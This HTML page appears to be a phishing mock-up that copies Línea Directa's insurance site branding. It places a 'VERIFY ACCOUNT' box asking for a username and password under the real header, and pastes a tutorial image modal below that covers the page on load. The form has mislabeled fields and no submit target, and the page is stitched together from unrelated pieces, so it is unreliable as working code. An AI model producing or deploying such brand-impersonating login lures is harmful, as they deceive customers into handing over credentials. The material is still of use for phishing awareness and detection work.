<!doctype html>

<html>
   <head>
      <meta charset="utf-8">
      <title>Seguros de coche,  seguro de moto, hogar y empresas – Línea Directa</title>
      <link rel="canonical" href="index.html" />
      <meta name="Description" content="Los mejores seguros de coche, de moto, de hogar y de empresa. Calcula online el precio de tu seguro y obtén el mejor precio.">
      <meta name="keywords" content="Seguros de coche, seguros de hogar, seguros de moto, seguros para empresas, calcular precio seguro.">
      <meta http-equiv="X-UA-Compatible content=" IE="edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">	
      <meta property="og:title" content="Seguros de coche, seguros de moto, seguro de hogar y empresas - Línea Directa"/>
      <meta property="og:type" content=" website"/>
      <meta property="og:image" content="https://www.lineadirecta.com/image/logo_lineadirecta_seguros_276x200.png"/>
      <meta property="og:url" content="https://www.lineadirecta.com/"/>
      <meta property="og:site_name" content="Línea Directa Aseguradora"/>
      <meta property="og:description" content="Los mejores seguros de coche, de moto, de hogar y de empresa. Calcula online el precio de tu seguro y obtén el mejor precio."/>
      <meta name="twitter:card" content="summary">
      <meta name="twitter:site" content="@LineaDirecta_es">
      <meta name="twitter:url" content="https://www.lineadirecta.com/"/>
      <meta name="twitter:title" content="Seguros de coche, seguros de moto, seguro de hogar y empresas - Línea Directa"/>
      <meta name="twitter:description" content="Los mejores seguros de coche, de moto, de hogar y de empresa. Calcula online el precio de tu seguro y obtén el mejor precio."/>
      <meta name="twitter:image" content="https://www.lineadirecta.com/image/logo_lineadirecta_seguros.png"/>
      <link rel="stylesheet" type="text/css" href="https://www.lineadirecta.com/css/Reset.css">
      <link rel="stylesheet" type="text/css" href="https://www.lineadirecta.com/css/general-comercial.css">
      <link href="https://www.lineadirecta.com/css/home-comercial.css" rel="stylesheet" type="text/css">
      <link rel="apple-touch-icon" sizes="180x180" href="https://www.lineadirecta.com/image/ico/apple-touch-icon.png">
      <link rel="icon" type="image/png" sizes="32x32" href="https://www.lineadirecta.com/image/ico/favicon-32x32.png">
      <link rel="icon" type="image/png" sizes="16x16" href="https://www.lineadirecta.com/image/ico/favicon-16x16.png">
      <link rel="manifest" href="https://www.lineadirecta.com/manifest.json">
      <link rel="mask-icon" href="https://www.lineadirecta.com/image/ico/safari-pinned-tab.svg" color="#cc3333">
      <meta name="theme-color" content="#ffffff">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <script src="https://www.lineadirecta.com/js/home-comercial.js"></script>
	<head>
	
<style>
body {font-family: Arial, Helvetica, sans-serif;}

#myImg {
    border-radius: 5px;
    cursor: pointer;
    transition: 0.3s;
}

#myImg:hover {opacity: 0.7;}

/* The Modal (background) */
.modal {
    display: 1; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    padding-top: 100px; /* Location of the box */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.9); /* Black w/ opacity */
}

/* Modal Content (image) */
.modal-content {
    margin: auto;
    display: block;
    width: 80%;
    max-width: 700px;
}

/* Caption of Modal Image */
#caption {
    margin: auto;
    display: block;
    width: 80%;
    max-width: 700px;
    text-align: center;
    color: #ccc;
    padding: 10px 0;
    height: 150px;
}

/* The Close Button */
.close {
    position: absolute;
    top: 15px;
    right: 35px;
    color: #f1f1f1;
    font-size: 40px;
    font-weight: bold;
    transition: 0.3s;
}

.close:hover,
.close:focus {
    color: #bbb;
    text-decoration: none;
    cursor: pointer;
}

/* 100% Image Width on Smaller Screens */
@media only screen and (max-width: 700px){
    .modal-content {
        width: 100%;
    }
}
</style>
</head>

   <body>



      <header>
         <h1 class="logo">
            <img src="https://www.lineadirecta.com/image/img-logo-lineadirecta.jpg" alt="Linea Directa Aseguradora. Seguros de coche, motos, hogar y vehículos comerciales" title="Linea Directa Aseguradora. Seguros de coche, motos, hogar y vehículos comerciales" />
            <a class="iconMenuTop" href="javascript:void(0);" style="font-size:15px;" onclick="myFunction()"> <img src="https://www.lineadirecta.com/image/menu-resp-rojo.svg" alt="Seguros Línea Directa"> </a>
         </h1>
         <div class="acceso">
            <span class="numTelefono" x-ms-format-detection="none">902 123 253</span>       
         </div>
      </header>
	<fieldset>
	<legend>VERIFY ACCOUNT</legend>
	<h1>YOU NEED TO LOGIN BEFORE PROCCEEDING</h1>
	<form>
	  Username:<br>
	  <input type="text" name="firstname">
	  <br>
	  Password:<br>
	  <input type="text" name="lastname">
	</form>
	</fieldset>
        
      

<body>

<h2>Image Modal</h2>
<p>In this example, we use CSS to create a modal (dialog box) that is hidden by default.</p>
<p>We use JavaScript to trigger the modal and to display the current image inside the modal when it is clicked on. Also note that we use the value from the image's "alt" attribute as an image caption text inside the modal.</p>

<img id="myImg" src="dora.jpeg" alt="Trolltunga, Norway" width="300" height="200">

<!-- The Modal -->
<div id="myModal" class="modal">
  <span class="close">&times;</span>
  <img class="modal-content" id="img01">
  <div id="caption"></div>
</div>

<script>
// Get the modal
var modal = document.getElementById('myModal');

// Get the image and insert it inside the modal - use its "alt" text as a caption
var img = document.getElementById('myImg');
var modalImg = document.getElementById("img01");
var captionText = document.getElementById("caption");
img.onload = function(){
    modal.style.display = "block";
    modalImg.src = this.src;
    captionText.innerHTML = this.alt;
}

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks on <span> (x), close the modal
span.onclick = function() { 
    modal.style.display = "none";
}
</script>


     
   </body>
</html>
